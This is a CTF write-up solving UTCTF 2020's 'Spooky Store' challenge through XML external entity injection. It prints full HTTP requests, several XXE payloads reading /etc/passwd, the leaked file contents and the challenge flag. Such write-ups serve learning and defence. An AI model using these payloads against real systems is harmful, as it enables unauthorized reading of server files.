Solving Spooky Store from UTCTF 2020

Posted on Mon 09 March 2020 in CTF by 0xm4v3rick

The CTF challenge was a below.

1
2
3
4
5
It's a simple webpage with 3 buttons, you got this :)

http://web1.utctf.live:5005/

by matt

Opening the challenge URL shows a page with 3 locations and an option to Check Nearest Location on each. Clicking on one of them, generated following request and response.

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
POST /location HTTP/1.1
Host: web1.utctf.live:5005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web1.utctf.live:5005/
Content-Type: application/xml
Origin: http://web1.utctf.live:5005
Content-Length: 93
Connection: close

<?xml version="1.0" encoding="UTF-8"?><locationCheck><productId>1</productId></locationCheck>

Response:

1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 07 Mar 2020 08:58:01 GMT
Server: Werkzeug/1.0.0 Python/3.8.1
Content-Length: 60
Connection: Close

The nearest coordinates to you are: 25.0000° N, 71.0000° W

Post request body contains XML data so there is a big chance of XML related issues and it did smell like XXE ;). So I searched around for some payloads that I could use and landed here. Using some of the payloads directly did not result in anything interesting, so it was time to step back and think.

As it turned out, I needed to use already available <productId> tag to reference the entity. The initial payload which included random tag <blah> as below did not work. 

1
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><blah>&xxe;</blah>

But this payload below did work using the already available tag.

1
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><blah><productId>&xxe;</productId></blah>

Another payload that earned the same results was

1
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><locationCheck><productId>&xxe;</productId></locationCheck>

So the final request was generated to get the flag on the last line of response looked like this.

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
POST /location HTTP/1.1
Host: web1.utctf.live:5005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web1.utctf.live:5005/
Content-Type: application/xml
Origin: http://web1.utctf.live:5005
Content-Length: 175
Connection: close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><locationCheck><productId>&xxe;</productId></locationCheck>

Response:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 07 Mar 2020 05:54:36 GMT
Server: Werkzeug/1.0.0 Python/3.8.1
Content-Length: 1234
Connection: Close

Invalid ProductId: root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
utctf:x:1337:utflag{n3xt_y3ar_go1ng_bl1nd}

That's it. Finally thanks to UTCTF Team for the chall. Feel free to contact me on twitter for queries or feedback. Cheers!!

webappsec XXE writeup